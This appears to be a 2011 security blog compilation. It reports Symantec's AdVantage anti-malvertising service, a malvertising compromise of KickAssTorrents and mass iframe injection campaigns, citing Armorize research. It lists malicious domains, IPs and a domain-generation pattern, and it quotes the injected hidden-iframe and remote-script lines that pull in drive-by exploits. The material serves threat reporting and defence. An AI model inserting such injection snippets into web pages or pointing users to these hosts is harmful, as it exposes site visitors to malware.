Symantec AdVantage(Anti-Malvertising): Armorize and Symantec partnered and launched


Armorize Technologies(malware blog) and Symantec joined together to fight against Malvertisement. They launched a AdVantage(Anti-Malvertising) Technology, cloud based scanner to detect the malvertising(malware advertisement) in online.

“Malvertising poses a serious risk to online publishers and their customers, reputation and revenue. Highly publicized malvertising infections can damage the reputation of even the most trusted online sites. Symantec AdVantage will provide ad publishers the tools they need to protect their businesses by fighting back against these threats.”
– Fran Rosch, Vice President, Identity and Authentication Services, Symantec Corp.

 Symantec Advantage will scan, detect and report malvertising on websites by automatically alerting publishers and identifying the location of malicious advertisements so customers can remove malicious ads that may damage their business’ reputation. A real-time performance dashboard complements these automatic reports by providing essential insights. For example, Symantec AdVantage will enable customers to compare safe ads to malicious advertisements and discover how and when malvertising occurred by visually tracing and identifying the path and source of infected advertisements .

Symantec AdVantage is scheduled to be made available to publishers and ad networks through a free early access program beginning in November 2011.

The service will be available here:
http://advantage.symantec.com/

Reference:
Few days back, the famous site " KickAssTorrent(KAT.ph)" served malvertising, detected by Armorize.

KickAssTorrents(Kat.ph) infected and serving malware through Malvertising

A Famous Torrent website's(alexa Rank:321) KickAssTorrents(kat.ph) OpenX platform compromised, and served a fake antivirus "Security Sphere 2012" through malvertising(stands for malicious advertisement),detected by armorize.When the user click the ad, it will redirect to fake page. This page infects users without their knowledge.


Coincidentally, KickAss Torrents published a blog post on Oct 10th in response to the website being flagged by antivirus vendor Avast. In it they said:
===================
Our users that are using the Avast anti-virus might have noticed that KAT.ph suddenly became labeled as a dangerous website for users that are not logged in. We want to assure our users that KickassTorrents has no malware or viruses of any kind and it is absolutely safe to use our website. We already contacted Avast and currently we are trying to find and fix the cause of this problem. You will help us if you choose the "Report the file as a false positive" option if you get the alert.
===================

In another thread, KickAss Torrents said:

===================
Now what the hell does this error mean?
First of all, don't flip out, don't go post on the KAT site, post down here if you experience the same problem.
Secondly, report down here if you experience this error.
Thirdly, add kat.ph to the safe URLs in your AV.
And lastly, please go to this site and report the problem (Avast! users only):
Avast! forum thread
Back on topic. What is this error? Does error roughly means that your anti-virus software has found some bad code in an iFrame. This could be from the site itself, or from advertisements. An iFrame is a piece of code that allows you to do several things. Embedding something to your site is a good example.
I hope this topic helps a little and I certainly hope the error is going to be fixed now.
Q&A:
Q: OMFG IS KAT HACKED?
A: Nope, just some error.
Q: Is it really safe to visit KAT?
A: Yes, it is.
===================
KickAss Torrents also referred to this discussion thread on Avast's forum. At the end of the forum it appears that Avast has acknowledged that it was indeed a false positive and have addressed the issue:

===================
Hello,

It should be solved, if not let us know please.

Miroslav Jenšík
AVAST Software a.s.
===================

Well, that time it might have been a false positive from Avast, but this time the website is absolutely infecting its visitors, as seen in our video.


The attacker injected the malicious script using the following url:
http://ad.kat.ph/delivery/ajs.php?zoneid=4&target=_blank&charset=UTF-8&cb=95920847237&charset=UTF-8&loc=http%3A//www.kat.ph/§ion=1939940

At the time of detection , only 2 out of 42 detected the malware in virustotal analysis.

According to Armorize,this attacker is responsible for speedtest.net incident.

Using DynDNS domains for their exploit server. Domain names are auto-calculated using Javascript. The algorithm used generates a (predicable) different dyndns.tv domain name every hour, in the format of roboABCD.tv, where ABCD are characters with a fixed seed and incremented by one character every different UTC hour.

The new dyndns domain for the next hour is generated every hour precisely at minutes 2 to 5, so this may be done by an automated mechanism.

All generated domains resolve to a single IP: 184.22.224.154 (AS21788, United States Scranton Network Operations Center Inc), located in the US.

The domain: obama-president.com resolves to this IP and is serving the same exploit pack. This domain was registered on Aug 4th through an Russian registrar, 1'ST DOMAIN NAME SERVICE www.1dns.ru. At this time the domain resolved to an Netherlands IP 85.17.93.9. The domain started to resolve to 184.22.224.154 on Aug 23rd. This IP and the president-obama.com domain are both currently still up and working.

This video show how the users infected:




Another Mass IFrame Injection Attack |350,000 ASP sites infected

 Another Mass Iframe Injection Attack detected by armorize.com Researchers.  On july, They detected the Mass Iframe injection that infected the 90000 websites. Looks like this time the number of sites is increased.   350,000 websites infected by Malware.  Also they targeted the website that are developed using ASP.net.


As per the Google result, there is 180,000 websites infected by this Iframe injection attack. They targeted victims who use 6 particular language:English, German, French, Italian, Polish, and Breton in their websites.
If you want to check the list of Infected sites, then do google search as "http://jjghui.com/urchin.js".  Never click the website that return by google after this search.  It will launch the malware attack.

Malware Infection:
The Malicious scripts inserted inside the victims website causes the visiting browser to load an iframe first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu.
Multiple browser-based drive-by download exploits are served depending on the visiting browser.

When the user is redirected to the malware server, it will server to the visitors. The malware will be automatically installed without your knowledge. This is if they have outdated browsing platforms (browser or Adobe PDF or Adobe Flash or Java etc).

Currently, the 6 out of 43 antivirus vendors on VirusTotal can detect the dropped malware.

jjghui.com resolves to IP 146.185.248.3 (AS3999), which is in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352), which is in the US and hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to IP 67.208.74.71 (AS33597), which is in the US and hosted by InfoRelayOnlineSystems.

The dropped malware attempts to connect to: 65.98.83.115 (AS25653), which is in the US.


IFrame Injection:
They inserted the Iframe inside the webpage using the web application vulnerability. like this:
<script src="Link_to_malicious_script"></script>

This inserts the malicious javascript inside website.  This malicious script generates an iframe to www3.strongdefenseiz.in, which gives an HTTP 302 redirect to the exploit server at www2.safetosecurity.rr.

Security Tips from BreakTheSecurity.com to Web Masters:
If your site also infected, then delete all files from your server. I hope you have backup of your website contents. Install the Latest Antivirus in your system. Verify your code before uploading.

90000 Web Pages Infected by Mass IFrame Injection

Security Experts Wayne Huang, Chris Hsiao, NightCola Lin discovered the Massive Iframe attack on commerce websites. There is more than 90000 websites infected by this attack. All infected websites pointing to willysy.com.

Google indicates more than 90,000 infected pages (note it's pages not domains)


Massive Injection:
initially it was:

<iframe src="hxxp://willysy.com/images/banners/" style="position: absolute; visibility: hidden;"></iframe>

Later it became:
<script src="hxxp://exero.eu/catalog/jquery.js">
</script>

As per armorize, the infected websites redirected to some other malware domain and downloads malwares to client system.

Screenshots of Infected Pages:




Video :


source:armorize